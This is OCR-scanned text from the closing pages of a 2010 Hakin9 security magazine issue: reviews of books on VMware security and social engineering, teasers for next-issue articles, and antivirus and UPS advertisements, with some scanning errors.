Given the ubiquity of the installed 
base of Microsoft's server software, the 
rather low cost for relatively powerfu 
servers and the growing security issues 
surrounding email it's an easy argument 
that even smaller organizations should be 
considering using the AXIGEN solution to 
bring mail services in house. 

About Gecad Technologies 

Gecad Software was established in 1992 
with a primary mission of researching 
and developing software products. Gecad 
Technologies was established in 2001 
and since 2004 has focused on the 
development and distribution of innovative 
messaging solutions, under the brand 
name AXIGEN. A significant portion of the 
software development team has extensive 
experience in the area of network 
security having formerly worked on the 
development of the RAV anti virus software 
(sold to Microsoft in 2003). 

Mike Shafer 
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BOOK REVIEW 




Author: Edward L. Haletky 
Publisher: Pearson Education Inc. 
ISBN-10: 0-137-15800-9 
ISBN-13: 978-0-137-15800-3 



Review of the VMware book 



As a Security Architect was excited 
to hear about the new VMware 
vSphere and Virtual Infrastructure 
Security book, having worked on the security 
of a number of VMware infrastructures a 
comprehensive book on the subject was lacking. 

The book starts off explaining the challenges 
and issues of security in a virtualised environment. 
Chapter 2 follows on, explaining the autonomy of 
a hack and there conseguences, regular Hackin9 
readers would be fully aware of these topics 
including Cross-site scripting, buffer-overflows and 
SOL Injection attacks, what is really clever is the 
author then references these chapters throughout 
his book putting configurations and designs into 
context for the reader 

This brings me to my first issue with the book, 
the author is definitely an expert on VMware 
technologies and has enormous experience, 
whenever the author talks about VMware the 
information is clear concise and generally very 
good, but whenever the author discusses security 
topics I found the information would sometimes 
be lacking, misses the point or is just not based 
in the real-world. For example in Chapter 1 his 
basic definitions of Threat and Vulnerability were 
poor and he then links them together with a term 
Security Fault, there are further examples of these 
problems throughout the book. 

Overall the structure of each chapter in the 
book is good, the author starts off explaining 
some terms, shows some secure designs, brings 
massive technical knowledge and experience 
and then provides some additional reference. The 
author also makes creative use of Security notes, 
little comments throughout the pages. 

There are twelve chapters in this book and 
after defining the security issues they can be split 
into a number of overall ideas, starting off with 
the internals of VMware. In Chapters 3, 4 and 5 
the authors discuses the internal workings of the 
VMware hypervisorand how its design affects 
security, a chapter on Storage, with sections on 
SANS, ISCSI and VCB and a chapter on Clustering, 
again working on the design and types of clusters 
but also the technical side of how they work and 
the considerations in terms of security 

The book then moves on to the management 
of VMware, with Chapter 6 starting off an overview 
of the deployment and management of VMware 
solutions including sections on integration with a 



number of Directory Services and even a link to 
a Twitter plug-in for the management client VIC. 
h Chapter 7 - Operations and Security there 
were sections on the day-to-day management 
of VMware ESX servers and with Chapter 8 a 
discussion on Virtual machines (VM Guests) and 
their security and management. 

The final few chapters included Networking 
(Chapter 9) with extensive diagrams some 
with large numbers of VLANS and network 
cards, VDI (Virtual Desktop Infrastructure) an 
exciting technology allowing personalised virtua 
desktops, Chapter 11 (Security and VMware 
ESX) discussed strategies for lock-down of 
individual ESX hosts and virtual environments, 
and Chapter 12 Digital Forensics and Data 
Recovery. There was also a small conclusion 
chapter summarising the author's final thoughts 
and extensive Appendix sections. 

My favourite chapters were Digital Forensics 
and Data Recovery (Chapter 12), not something 
discussed in regular VMware books and Virtual 
Networking Security - Best practices (Chapter 
9), which had some comprehensive secure 
network designs. 

All in all a significant amount of work has 
gone into this book, but there are some major 
flaws, part of the books title is VMware vSphere, 
but there is little or no mention of vSphere or ESX 
4.0. In Chapter 11, all of the hardening steps are 
for ESX 3.5, although the overall designs are still 
valid and there is enough reference material to 
fill in the gaps with your favourite search engine. 
There was also no mention of the whole area 
of patching VMware hosts or VM Guests with 
VMware Update Manager and also no discussion 
of VMware's firewalling technology vShield which 
comes bundled with the advanced versions of 
ESX 4.0 and would have had significant impact 
on Chapter 9 (Virtual Networking Security). 

Overall the book has good structure and an 
easy going writing style, it also brings together 
a number of good sources of information in 
one easy to follow book. If you are a System 
Administrator or a System Architect that 
designs VMware solutions then it is a good 
reference guide and a comprehensive work. If 
you're a Security professional then there is also 
some good information in terms of design and 
summaries of the issues surrounding VMware 
environments. 
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REVIEW 




Hacking 
the Human 

IAN MANN 



Hacking the Human 



Every security system in the world 
has the exact same weakness, the 
human being that always present 
somewhere with the necessary access for 
someone to exploit. 

This book is dedicated to the wonderfu 
world of social engineering, the one area 
that is usually missed on audits and risk 
assessments, but in my opinion this is the 
most important area, because if you can get 
someone to do the deed on your behalf, how 
can you get caught! 

By concentrating on the psychologica 
aspect of social engineering (its not just about 
conning people), this book explains in detail all 
the basics in human vulnerabilities. There is an 
excellent set of examples throughout the book 
that make the reader start to think outside 
the usual technical security boundaries, and 
concentrate on the easiest route to exploit. 

The author uses the introduction as 
a example in social engineering, which 
was a new experience. Some people skip 
introductions and want to get straight into a 
book. I read this one 3 times doublechecking 
it against the details provided in a later 
chapter. 

Throughout the book there is constant 
reference to ISO27001 which highlights how 
serious everyone needs to take the risk of 
having people working for them, and how they 
need to be trained and protected from this 
very easy avenue of attack. There are three 
sections to the book; 

The Risks 

This section introduces you into the world 
of social engineering and the risks involved 
in this area. By explaining the various 
approaches that can be used to assess this 
risk, each is compared against ISO27001 and 
how relevant this approach is towards socia 
engineering. 

By clearly explaining the vulnerabilities 
we all face and the risks associated with the 
psychological weaknesses that we all have (it is 
part of the usual human nature after all) it starts 
to become clear how complex this area of 
information security really is. You are given an 
excellent example of an attack on a company, 
and how to take a „non-standard" approach 
towards breaching their security. 



Understanding Human 
Vulnerabilities 

The next section was facinating for me, and for 
those of you that ever have to deal with sales 
people. See how many of these technigues you 
can identify being used on you when they next 
come to call, (or you could try these techniques 
on them, and pay a cheaper price) 

From mind reading to neurolinguistic 
programming, this section clearly explains how 
what we say and the way we say can have a 
huge effect on people and on ourselves. There 
is a very good diagram that shows which 
personality profiles on average tend to comply 
and which of those would potentially challenge 
your perceived authority. 

Everytime a social engineer attack a target, 
they will „puton" a personna while performing 
the attack. These personnas are grouped into 
3 distinctive groups (Parent, Adult, Child), and by 
adopting one of these states, the engineer will 
know how to deal with the other 2 types if they 
come across them during their attack, (there is 
a lovely example of how to make a child spill a 
drink, while telling them not to!) 

Countermeasures 

This final section takes you through starting 
to build a defence against social engineering 
attacks. From profiling your own staff to building 
awareness within them on how people will try 
to persaude them to release information that 
should be kept confidential. You are then given 
details on the different types of testing that can 
be conducted. Use the information gathered 
from the book to start your own tests, and see 
how vulnerable you really are. 

There is a further reading section at the 
end of the book and has good advice for those 
of you that wish to pursue more information 
regarding this „black art", and it also points 
to where the author has pulled his ideas and 
information from to produce such an excellent 
read. 

can't recommend this book highly enough, 
this book belongs on the shelf of every IT 
Security Manager's shelf in my opinion as there 
clearly aren't enough books out there that bring 
enough focus to this area of vulnerability within 
every company. 
Buy this book! 



Author: Ian Mann 
Publisher: Gower Publishing Ltd 
ISBN-10: 0566087731 
ISBN-13: 978-05 660 8 7738 



2/2010 HAKIN9 81 




Inside-Out web based 
attacks: the new ways 

This article is very technical and discusses 
new techniques of exploitation based 
on the web: Inter-protocol exploitation, 
gifars and crossdomain policies, pdfars, 
XSRF. This is a really hot topic, as most of 
the applications are being written to the 
web, and for the web. Combining known 
techniques with social engineering and 
0-days exploits (and a bit of inventiveness 
), new attack scenarios can be created 
(bypassing security policies such as DMZ, 
firewalls, Antivirus, even the advanced user 
that can be suspicious). 



Current information on 
Hakin9 Magazine can be 
found at: 

http://www.hakin9.org/en 



The editors reserve the right to make changes to the content. 



Forensic Examination 
and Evaluation of Instant 
Messenger Databases 

Nowadays more and more people use 
various instant messenger services like 
ICQ, MSN, AOL, or even less known like 
gadu-gadu for work, for pleasure and 
sometimes also for crimes. The article 
aims to provide information and insights on 
how the information disseminated through 
those networks are stored on the local 
computers and what can be found there, 
where and how. 



The next issue will be 
available in May 2010 

Where to find it? 

■ Barnes & Noble 

■ Borders 

■ B. Dalton 

■ Microcentre 



Analyzing Malware & 
Malicious Content 

Malware, short for malicious software, is 
a piece of software that's sole purpose 
and design is to infiltrate or cause 
damage to a computer system without 
the owner's well informed consent. In the 
information security world we hear this 
term or expression all the time used by 
professionals to describe a variety of 
hostile, intrusive or other wise annoying 
code running on a system. 



Pwning Embedded ADSL 
Routers 

This paper sheds light on the hierarchica 
approach of pen testing and finding 
security related issues in the smal 
embedded devices that are used for loca 
area networks. The paper is restricted 
to not only testing but also discusses 
the kinds of software and firmware used 
and incessant vulnerabilities that should 
be scrutinized while setting up a loca 
network. A detailed discussion will be 
undertaken about the HTTP servers used 
for handling authentication procedure 
and access to firmware image providing 
functionalities to design and configure your 
own home local area network. 



Do you have a good idea for an 
article? 



Would you like to become an Author 
or our Betatester? 



Just send us an e-mail at: 
en@hakin9.org 
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Much more than just an antivirus 



Antivirus & Anti-malware 



Anti-phishing 



Two-way firewall 



Real-Time & On-demand scanners 



Anti-spyware 




Protect your Mac from malware and network threats 

Only VirusBarrier X6 provides comprehensive protection from malware and network 
threats. VirusBarrier X6 is the only antivirus program for Mac that includes full anti-malware 
protection together with two-way firewall, network protection, anti-phishing, anti-spyware 
features and more. VirusBarrier X6 protects Macs from all known network-based 
threats, as well as all known malware. 

Also available is Internet Security Barrier X6, which includes VirusBarrier X6 and four 
other Intego programs, providing parental control, backup, antispam, confidential 
document protection features and much more. 

Intego X6 software is priced lower than X5 versions, and the standard licenses protect 
up to 2 Macs. Also available: 5-Mac family packs and multi-seat licenses. 




www.intego.com 
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we protect y ou r world i ntego 



Protects your computer, 
the environment and your wallet. 




APC Back-UPS BE750G with 
SmertShedding Technology 
automatically powers down 
idle peripherals to save 
energy end money. 




Get the most ener gy-efficient desktop battery backup yet. 



Let's protect what's important. 

What's in your computer? Photos, music, 
personal files, financial data, broadband 
access, videos, and more. Your computer 
has never been more important, and 
yet it has never been at higher risk 
for damaging power surges and other 
disturbances. 

So like most people, you need to protect 
your assets. But like most people, you'd 
also like to protect the environment. 
With our new energy-conscious products, 
you can do both. Energy efficient by 
design, our new smart products protect 
the power going into your computer, 
at a cost that is quickly offset by big 
energy savings. How? Not only do the 
new Back-UPS ES and SurgeArrest 
use power wisely, they also boast a 
master/controlled outlets feature, which 
automatically powers down idle devices 
to conserve energy. 

APC power protection products are available at 

CDW) 



STAPIES 



PC Connection- 



"The price tag on the new UPS is S99. While 
I'm not in the habit of endorsing products 
in this blog, if you're in the market for a 
workstation-class UPS, why not opt 
for the greener option?" 

- Heather Clancy, 
ZDNet.com 

In fact, while protecting your power 
supply, we're up to five times more 
energy efficient than any other solution. 
By saving you $40 per year in energy 
costs, our Back-UPS ES pays for itself in 
two short years. The high-frequency, low- 
copper design has a smaller transformer 
and environmental footprint. Even the 
packaging has been carefully selected 
and manufactured to maximize use of 
recycled materials and minimize waste. 

In this world, every decision you make 
counts. So protect your power with a 
battery backup that works to protect 
the environment. It conserves power, it 
pays for itself, and it's backed by APC's 
20-plus years of Legendary Reliability. 
For more information on this 
or our other great products, 
or for information about 
environmentally responsible 
disposal of your old battery, 
visit www.apc.com 




Energy-efficient solutions for 
every level of protection: 



Surge Protection 

Starting at*34 

Guaranteed protection 

from surges, spikes, 

nnrl lightning. 

7 outlets, Phone/Fax/Modem 
Protection, Master/Controlled Outlets 




SwgeArrest 
P7GT ^ 

■<4f 




Batk-UPS 
ES750G 



Enter to Win a Back-UPS ES 750G! [mm 

Also, enter the key code to view other special offers and discounts. 

Visit wwwf.apc.com/promo Key Code n519w or Call BBB-289-APCC x8253 or Fax 401-788-2797 



Battery Back-UPS 

Starting at $gg 

Our most energy- 
efficient backup for 
home computers. 

10 outlets, DSL and Coax 
protection. Master/Controlled 
Outlets, High- Frequency Design, 
70 minutes of runtime 1 



APC can help with your other power protection needs, 
l/isit www.epc.com to See our complete line of innovative products. 




Legendary Reliability* 



©2009 Schneider Electrtc. Alt Rights Reserved Schneider Electric. APC. StnartShedding. Back'UPS. SurgeArrest. and Legendary Reliability are owned by Sctineidef Electric, or its affiliated companes in me United States and other countries. 
All other trademarks ace property ol Iheir respective owners, e-mail: esupportftapc.com • 132 Fairgrounds Road. West Kingston. Rl 02S92 USA * 99(^0969 
'Average savings are based on comparable competitive models, and are comprised of two energy-saving features, art ultfa^fftcient electrical design, and the master/controlled outlets feature. tRuntimes may vary depending on load. 



